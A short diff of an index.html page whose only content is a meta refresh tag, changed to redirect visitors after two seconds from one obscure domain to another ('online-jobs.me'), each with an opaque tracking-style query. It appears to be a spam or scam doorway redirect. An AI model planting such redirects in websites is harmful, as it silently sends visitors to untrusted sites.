--- a/index.html
+++ b/index.html
@@ -1,6 +1,6 @@
 <!DOCTYPE html>
 <html>
-  <META http-equiv="refresh" content="2;URL=http://abcreg.me/qs=r-abacaggichjdacagefbiabagefbiacaidadhaceaccghaebdfaebhgkbacb"> 
+  <META http-equiv="refresh" content="2;URL=http://online-jobs.me/qs=ua-abacaggkgkdhacagefbiabagefbiacaidadhaceaccghaebdfaebhghgacb"> 
 <body>
 </body>
 </html>
